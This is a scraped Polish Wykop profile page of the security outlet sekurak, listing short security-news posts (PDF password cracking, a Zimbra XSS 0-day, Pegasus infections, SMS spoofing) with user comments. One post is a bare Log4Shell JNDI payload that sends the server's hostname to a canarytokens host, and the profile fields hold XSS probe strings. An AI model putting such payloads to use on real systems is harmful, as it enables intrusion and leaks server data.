Profil: @sekurak - strona 4

sekurak 05.02.2022, 10:24:09

USA testuje psy-roboty (Ghost Robotics) do patrolowania granicy z Meksykiem.

Kontrola zdalna lub tryb autonomii. Praca w ciężkich warunkach terenowych, w tym np. możliwość chodzenia po schodach
Opcjonalnie instalowany „payload” (kamera przesyłająca obraz na żywo, sensory, ...).

https://sekurak.pl/usa-testuje-psy-roboty-do-patrolowania-granicy-z-meksykiem/

źródło: comment_1644056596p2t5wDAOk8meJkAaQ5I0JD.jpg

Pobierz

FantaZy

05.02.2022, 10:30:47

@sekurak: Polsce też by się przydało ( ͡° ͜ʖ ͡°)

bb-8

05.02.2022, 12:01:50

@sekurak: jej, było w black mirror ( ͡° ͜ʖ ͡°)

Łamanie pliku PDF, którego hasłem jest PESEL

W tym przypadku PIT-a za 2021 rok zahasłowanego za pomocą numeru PESEL. Okazuje się, że złamanie takiego hasła to koszt ok 4 złotych

z dodany: 04.02.2022, 07:11:25

sekurak

sekurak 04.02.2022, 15:07:31

-1

@mus_tang: to prawda, ale a) jak widać dodatkowe toole z niego cały czas się przydają b) AFAIR są jeszcze jakieś algorytmy które łamie JTR, a które jeszcze nie są zaimplementowane w hashcacie

sekurak

sekurak 04.02.2022, 15:10:13

@TrueShutDown: tak właśnie jest zrobione w drugim etapie (pkt 5/6 + przeliczenie sumy kontrolnej).

W pierwszym etapie/podejściu, to nie ma się co w ogóle bawić w żadne optymalizacje, bo pesymistyczny czas crackowania wynosi ~1 minuta. Więc przygotowanie optymalizacji potrwa więcej niż samo crackowanie :-)

sekurak

sekurak 04.02.2022, 15:11:29

@kruczy: też baaardzo dużo zależy od tego jaki algorytm został użyty do zahasłowania PDFa (jaki poziom kompatybilności). Ich bezpieczeństwo jest drastycznie różne :) We wpisie była badana w zasadzie najmocniejsza metoda zabezpieczenia PDF-ów (i tak jak widać można ją czasem złamać).

sekurak

sekurak 04.02.2022, 10:03:19

"Fajny" 0-day w Zimbra. Wystarczy, że klikniesz w linka osadzonego w mailu (nie trzeba otwierać żadnego załącznika) i po cichu wykradają zawartość całej Twojej skrzynki e-mailowej.

Podatność jest już uzbrojona - trwa aktywna kampania ataków, wykradająca podatnością XSS zawartość skrzynek pocztowych:

https://sekurak.pl/niezalatany-0-day-w-zimbra-8-x-xss-em-kradna-e-maile-ofiar/

#sekurak #programowanie #bezpieczenstwo #hacking #zimbra #webdev

źródło: comment_1643968828cxQicdAw0FX3p7UcHwRrED.jpg

Pobierz

Kupił akwarium. Oraz akcesoria. Przeskanował API i dostał roota.

Krótka historia, pokazująca, że każdy może spokojnie „pobawić się” w bezpieczeństwo IoT, osiągając satysfakcjonujące wyniki w krótkim czasie. We wpisie również linki do narzędzi przydatnych w tego typu badaniach.

z dodany: 02.02.2022, 21:06:51

Giga korporacja bierze na spytki twórcę curla (bo z niego korzysta :P) ...

Piszesz popularne oprogramowanie OpenSource. A tu nagle e-mail od giga korporacji, która akurat tego toola wykorzystuje. "Chcemy żebyś odpowiedział w 24h". Czy używałeś log4j? Czy miałeś incydenty bezpieczeństwa? Dostali całkiem dyplomatyczną odpowiedź: podpiszcie umowę wsparcia, to pogadamy.

z dodany: 01.02.2022, 06:58:41

sekurak

sekurak 31.01.2022, 10:34:29

Piszesz sobie popularne oprogramowanie OpenSource. A tu nagle e-mail od giga korporacji, która akurat tego toola wykorzystuje.

"Chcemy żebyś odpowiedział w 24h". Czy używałeś log4j? Czy miałeś incydenty bezpieczeństwa? Jakie ew. dane zostały wykradzione?

Dostali całkiem dyplomatyczną odpowiedź: podpiszcie umowę wsparcia, to pogadamy

https://sekurak.pl/giga-korporacja-bierze-na-spytki-tworce-curla-bo-z-niego-korzysta-p-odpowiedz-nam-w-24h/

źródło: comment_1643625258bZP7D32FdMmTBu2KRTdSBX.jpg

Pobierz

sekurak

sekurak 29.01.2022, 19:27:22

Intensywna kampania podszywająca się pod Blika. Wykorzystują spoofing SMSów i kradną dostępy do kont bankowych.

https://sekurak.pl/intensywna-kampania-podszywajaca-sie-pod-blik-a-wykorzystuja-spoofing-smsow-i-kradna-dostepy-do-kont-bankowych/

#sekurak #bezpieczenstwo #banki #oszukujo #blik

źródło: comment_1643484430Qj9Y7uAyqFfP865d9HQTkr.jpg

Pobierz

Matpiotr

29.01.2022, 23:27:25

Jak ktoś w to uwierzy, to oficjalnie jest debilem.

sekurak

sekurak 26.01.2022, 19:22:53

„Zainfekowany Pegasusem telefon Michała Kołodziejczaka był… wyprodukowany później niż data infekcji określona w raporcie Citizen Lab”. Czy aby na pewno?

Mamy też dodatkowe wyjaśnienia bezpośrednio od Citizen Lab - ekipy, która analizowała iPhone Michała Kołodziejczaka :

https://sekurak.pl/zainfekowany-pegasusem-telefon-michala-kolodziejczaka-byl-wyprodukowany-pozniej-niz-data-infekcji-okreslona-w-raporcie-citizen-lab-czy-aby-na-pewno/

#sekurak #bezpieczenstwo #pegasus #polska

źródło: comment_1643224965bn7dsalZEBBHEEQDYi8H2f.jpg

Pobierz

T.....r

konto usunięte 26.01.2022, 19:40:42

@sekurak: Mocno to uderza w wiarygodnosc tych inwigilacyjnych doniesien. Sekurak jak zawsze fachowo i rzeczowo:)

C.....m

konto usunięte 26.01.2022, 21:31:29

@sekurak: w fabryce mu zainfekowali juz, na tasmie jeszcze ( ͡° ͜ʖ ͡°)

Rząd chce pilnie walczyć z podszywaniem się pod numery telefoniczne

Pracujemy z rynkiem telekomunikacyjnym nad rozwiązaniami, które pozwolą walczyć z przestępcami wykorzystującymi spoofing i phishing - poinformował w środę sekretarz stanu ds. cyfryzacji Janusz Cieszyński.

z dodany: 19.01.2022, 15:11:53

sekurak

sekurak 20.01.2022, 15:20:48

@DyrmaZdzislaw: to trochę osobna sprawa. Bo podszywają się również pod numery banków czy dzisiaj nawet ZUS-u. A raczej bank czy ZUS wykupił swój numer dochowując wszelakich procedur :-)

TLDR: możesz wybrać praktycznie dowolny numer, nawet nie interesuje Cię do kogo on należy i robić spoofing.

Więcej info o tym temacie: https://sekurak.pl/ktos-podszyl-sie-pod-numer-telefonu-poslanki-pauliny-matysiak-i-zadzwonil-z-obelgami-do-innego-posla/

Czym tak naprawdę był „gigantyczny wyciek” z wojska – analiza

9 stycznia wyciekły dane z polskiego wojska, zrobiła się afera, pojawiły się memy, a potem wszyscy „odpowiedzialni za” uspokajali, że jednak nic się nie stało. Przyjrzyjmy się zatem temu, co zawierał "System Informatyczny Jednolitego Indeksu Materiałowego”

z dodany: 20.01.2022, 14:11:25

sekurak

sekurak 16.01.2022, 09:16:24

Masowy, destrukcyjny atak na ukraińskie organizacje. Trafione dziesiątki: instytucji rządowych / firm IT / organizacji non-profit.
Microsoft ostrzega o malware, który podszywa się pod ransomware, ale na celu ma tylko jedno - destrukcję plików na zainfekowanych systemach...

https://sekurak.pl/microsoft-niszczace-cyberataki-na-ukraine-podszywaja-sie-pod-ransomware-ale-na-celu-jest-calkowite-niszczenie/

#sekurak #ukraina #bezpieczenstwo #cyberbezpieczenstwo #wojna

źródło: comment_1642324556j4pRtp8NRloc64IP5orIQa.jpg

Pobierz

thority

16.01.2022, 09:20:24

@sekurak: mp4 nie ma, moja kolekcja materiałów do szkoły bezpieczna (⌐ ͡■ ͜ʖ ͡■)

f.....p

konto usunięte 16.01.2022, 10:41:23 via Android

@sekurak może tu uda mi się uzyskać odpowiedź bo na mailu i LinkedIn cisza. Jakieś info o wysyłce nagród za konkurs z ankietą? Miesiąc temu dostałem info, że wygrałem (⌐ ͡■ ͜ʖ ͡■)

sekurak

sekurak 15.01.2022, 10:43:53

Ukraińskie strony rządowe zhackowane. W umieszczonej grafice komunikat po polsku oraz koordynaty GPS ~Sztabu Generalnego Wojska Polskiego.

Link do oryginalnego obrazka (z koordynatami) w poście, jak ktoś chce sobie sam zobaczyć jak to wyglądało:

https://sekurak.pl/sporo-ukrainskich-rzadowych-stron-zhackowanych-w-umieszczonej-grafice-komunikat-po-polsku-oraz-koordynaty-gps-sztabu-generalnego-wojska-polskiego/

#sekurak #ukraina #dezinformacja #ciekawostki

źródło: comment_1642243389cioxJUcR03HElDuTbxbp3g.jpg

Pobierz

GacekNiebieski

15.01.2022, 10:46:57

@sekurak: Przeciez to wiadomo ze to rosyjska prowokacja ;)

P.....1

konto usunięte 15.01.2022, 10:49:43

@sekurak: ja p------e te ruski to są niezłe XD

sekurak

sekurak 15.01.2022, 10:42:13

Ciekawostka. Zhackował bezprzewodowo telewizor, który nawet nie był podłączony do internetu [film].

TLDR: Telewizor LG z 2019r. + SDR + HbbTV + exploit na przeglądarkę.

https://sekurak.pl/zhackowal-bezprzewodowo-telewizor-ktory-nawet-nie-byl-podlaczony-do-internetu-film/

#sekurak #telewizja #hacking

źródło: comment_1642243290H6zjqKCdIpgiwxgwilWk97.jpg

Pobierz

Co tak naprawdę wyciekło z Wojska Polskiego – analiza ujawnionych danych |...

Jest b--ń jądrowa, Pegasus (i inne konsole), w----y, firewalle i mnóstwo wierszy w bazie.

z dodany: 14.01.2022, 13:18:32

sekurak

sekurak 14.01.2022, 22:43:45

Nas w tej bazie chyba najbardziej ubawiła "Piwonia" (taki kwiatek jak ktoś nie wie ;-)

sekurak

sekurak 14.01.2022, 17:27:41

W co pocina Polska Armia? Proszę:

https://sekurak.pl/gigantyczny-wyciek-z-wojska-czyli-afera-z-czapy/

#sekurak #gry #wojsko

źródło: comment_1642181234AisPcdjph2GLhlIadou09w.jpg

Pobierz

ruum

14.01.2022, 17:39:51

@SilesianBear: @VTRaptor: albo jakaś bajka

Koliat

14.01.2022, 20:01:47 via Android

@ruum niekoniecznie. To jest spis pozycji w inwentarzu, a jako kraj mieliśmy na składzie głowice jądrowe przynajmniej do wycofania wojsk radzieckich. Być może ten spis jest budowany od wielu lat

sekurak

sekurak 05.01.2022, 11:59:50

Problemy bezpieczeństwa z cache w aplikacjach webowych. Kompleksowy poradnik od sekuraka.

Link do PDFa w poście:

https://sekurak.pl/problemy-bezpieczenstwa-z-cache-w-aplikacjach-webowych-kompleksowy-poradnik-od-sekuraka/

#sekurak #bezpieczenstwo #programowanie #webdev #programista15k

źródło: comment_1641383968q4oduVOwUs5EbsqsKe9Y19.jpg

Pobierz

happy3dprints

05.01.2022, 15:04:53 via iOS

@sekurak: Dobrze rozumiem, ze to fragment książki? Chce ja kupić wiec sam nie mogę sprawdzić.

sekurak

sekurak 23.12.2021, 17:47:54

Potwierdzenie trafienia Pegasusem kolejnej znanej osoby w Polsce. Telefon senatora Krzysztofa Brejzy infekowano aż 33 razy.

https://sekurak.pl/potwierdzenie-trafienia-pegasusem-kolejnej-znanej-osoby-w-polsce-telefon-senatora-krzysztofa-brejzy-infekowano-az-33-razy/

#sekurak #pegasus #bezpieczenstwo #security

źródło: comment_1640281654KDHzWHwtuYkvvoxoBe2x1v.jpg

Pobierz

sekurak

sekurak 20.12.2021, 19:50:14

Google Maps złapało w locie… niewidzialny bombowiec xD

https://sekurak.pl/google-maps-zlapalo-w-locie-niewidzialny-bombowiec/

#sekurak #ciekawostki #google

źródło: comment_1640029799GPdVR5G4SvsDwifiDjOICk.jpg

Pobierz

K.....t

konto usunięte 20.12.2021, 20:00:49

@sekurak: czyli jednak widzialny

wioslarz-umyslow

21.12.2021, 00:04:00

niewidzialny bombowiec xD

@sekurak: niewidzialny dla radarów, ale kto by się tam detalami przejmował.

sekurak

sekurak 13.12.2021, 11:28:10

${jndi:ldap://x${hostName}.L4J.25obcn7fccfmd1nh0rq6z8ky3.canarytokens.com/a}

@sekurak: ( ͡º ͜ʖ͡º)

@sekurak: tymczasem admini wykopu

sekurak

sekurak 11.12.2021, 11:12:49

Dziadek nagrał próbujących oszukać go "na wnuczka":

...
- A ile potrzeba?
- 50 tysięcy!
- Ile????!?!?!?!??!??!12*&@$*&$@*&^@*^

źródło: comment_1639220795iEIyeszCeXf9eOwXpy75V2.jpg

Pobierz

e.....a

konto usunięte 11.12.2021, 11:45:01

@sekurak: spieprzył sprawę jak powiedział że córka (chyba bo słabo słychać) nie może podejść do telefonu bo zmienia wnuczce pampersa a przecież to właśnie "wnuczka" dzwoni w sprawie wypadku. Trochę ciężko jest mieć wnuki między którymi jest jakieś 20 lat różnicy. Tak czy inaczej w połowie rozmowy wbiegł dzieciak krzycząc "dziadek do kogo dzwonisz" i spalił całą akcję. Szkoda

Sekurak”’<

hackalot'"<
Sekuraq'"<
http://www.sekurak.pl/'"<
Facebook
X (dawny Twitter)
Instagram

Osiągnięcia

Komentator
od 05.02.2022

Komentator
VIP
od 08.04.2021

VIP
Ekshibicjonista
od 13.03.2013

Ekshibicjonista
Rocznica
od 22.03.2024

Rocznica
Gadżeciarz
od 11.06.2019

Gadżeciarz
Mikroblogger
od 27.09.2019

Mikroblogger
Król Wykopaliska
od 07.03.2023

Król Wykopaliska
Koder
od 07.03.2023

Koder